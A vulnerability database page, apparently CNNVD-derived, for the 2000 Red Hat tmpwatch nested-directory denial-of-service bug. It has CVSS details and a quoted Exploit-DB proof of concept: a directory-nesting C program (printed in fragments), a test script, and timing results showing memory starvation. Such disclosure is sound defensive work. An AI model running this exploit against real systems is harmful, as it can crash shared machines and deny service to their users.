发布时间 :2000-11-14 00:00:00
修订时间 :2008-09-05 16:21:58

[原文]The tmpwatch utility in Red Hat Linux forks a new process for each directory level, which allows local users to cause a denial of service by creating deeply nested directories in /tmp or /var/tmp/.

[CNNVD]Red Hat Linux tmpwatch utility拒绝服务漏洞(CNNVD-200011-068)

        Red Hat Linux的tmpwatch utility将每个目录层次划分为新的进程,本地用户可以利用该漏洞通过创建/tmp或/var/tmp/的深层目录导致服务拒绝。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:redhat:tmpwatch:2.5.1Red Hat Linux 6.0 tmpwatch 2.5.1
cpe:/a:redhat:tmpwatch:2.2Red Hat Linux 6.2 tmpwatch 2.2

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  XF  linux-tmpwatch-fork-dos
(UNKNOWN)  BUGTRAQ  20000909 tmpwatch: local DoS : fork()bomb as root

- 漏洞信息

Red Hat Linux tmpwatch utility拒绝服务漏洞
低危 未知
2000-11-14 00:00:00 2005-05-02 00:00:00
        Red Hat Linux的tmpwatch utility将每个目录层次划分为新的进程,本地用户可以利用该漏洞通过创建/tmp或/var/tmp/的深层目录导致服务拒绝。

- 公告与补丁


- 漏洞信息 (20217)

RedHat Linux 6.1 i386 Tmpwatch Recursive Write DoS Vulnerability (EDBID:20217)
linux local
2000-09-09 Verified
0 zenith parsec
N/A [点击下载]

Any user with write access to /tmp or /var/tmp, can induce tmpwatch to cause Red Hat (and others runnng tmpwatch from cron) to stop responding, and possibly require a hard reboot. This is accomplished by creating a directory tree many (ie. ~6000) nodes deep in /tmp. For each level of the directory in /tmp, tmpwatch will fork() a new copy of itself.

Red Hat affected versions:

Red Hat Linux 7.0 (tmpwatch v.2.5.1)
Red Hat Linux 6.2 (tmpwatch v.2.2) 

(excerpted from Internet Security Systems Security Advisory)

"Source code comparison between the Red Hat Linux 6.2 and 7.0 tmpwatch packages
suggests this vulnerability was recognized and a fix was attempted. However,
the fix is incorrect, and the vulnerability is still exploitable.

Do not use the --fuser or -s options with tmpwatch."

---START---cut---:a.c (mode 644)
// make lots of directories.
// ./a <#of-dirs>
// ./a with no arguments to delete dirs.
main(int argc,char *argv[])
int c=0,d=0;
if (argc!=2) 
printf("c=%d removing\n",c);
while(!rmdir("./A")) {chdir("..");c--;}
if(c)printf("erm. bad thing.\n");
printf("c=%d making.\n",c);

# ./testscript

(code follows)

---START---cut---:testscript (mode 755)
# clear the previous stuff.
rm ./timer.results
touch timer.results
# create a 1 deep
./a 1 >>timer.results
time tmpwatch 240 . 2>>timer.results
# create a 100 deep
./a 100 >>timer.results
time tmpwatch 240 . 2>>timer.results
# create a 200 deep
./a 200 >>timer.results
time tmpwatch 240 . 2>>timer.results
# create a 300 deep
./a 300 >>timer.results
time tmpwatch 240 . 2>>timer.results
# create a 400 deep
./a 400 >>timer.results
time tmpwatch 240 . 2>>timer.results
# create a 500 deep
./a 500 >>timer.results
time tmpwatch 240 . 2>>timer.results
# create a 600 deep
./a 600 >>timer.results
time tmpwatch 240 . 2>>timer.results
#tidy up.
./a >>timer.results


If you don't want to test it manually, here you will find the results on
the tests on my machine. Who says u need an Athlon with cable or DSL. I
say "Well, it would be nice. Real nice." I also think this program would
probably die faster and more spectacularly on a fast machine with a huge
amount of memory and swap space. Oh yeah. Save anything important. And you
have to run it as root. (I think. Should probably thought of that. I'll
remember it for next time.) The crontab is an effective way of getting it
run as root. Which it wants to do anyway. At about 4am everyday.

--START---cut---:timer.results (mode 644)
c=1 making.
0.00user 0.01system 0:00.00elapsed 125%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (96major+58minor)pagefaults 0swaps
c=100 making.
0.01user 0.19system 0:00.19elapsed 100%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (96major+1797minor)pagefaults 0swaps
c=200 making.
0.07user 0.40system 0:00.49elapsed 94%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (96major+3554minor)pagefaults 0swaps
c=300 making.
0.10user 0.66system 0:00.76elapsed 99%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (96major+5308minor)pagefaults 0swaps
c=400 making.
0.13user 1.33system 0:11.80elapsed 12%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (11766major+9445minor)pagefaults 1263swaps
c=500 making.
0.15user 2.11system 0:22.38elapsed 10%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (14104major+13238minor)pagefaults 2699swaps
c=600 making.
0.21user 2.81system 0:32.61elapsed 9%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (26066major+17781minor)pagefaults 4109swaps
c=600 removing
c=600 making.
0.11user 2.88system 0:36.14elapsed 8%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (25741major+17567minor)pagefaults 4009swaps
c=700 making.
0.20user 4.24system 0:45.95elapsed 9%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (35562major+22180minor)pagefaults 5542swaps
c=800 making.
Command terminated by signal 2
0.00user 0.00system 6:01.87elapsed 0%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (102major+18minor)pagefaults 10swaps

(System is Cyrix-6x86 @ 187 MHz, 32M physical ram, 64M swap.)

(^C was pressed after about a minute into the 800 deep one. Several system
programs died due to memory starvation. It took a quite a while afterwards
before the console regained any usabilty. When i tried to run startx, it
refused to start. xfs had died. everything looked odd. slow motion. i
think it was because of the loadavg)

# uptime
9:00pm up 2:14, 2 users, load average: 202.28, 363.68, 186.46		

- 漏洞信息

Red Hat Linux tmpwatch Nested Directory Local DoS
Local Access Required Denial of Service
Loss of Availability Patch / RCS
Exploit Public Third-party Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2000-09-09 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete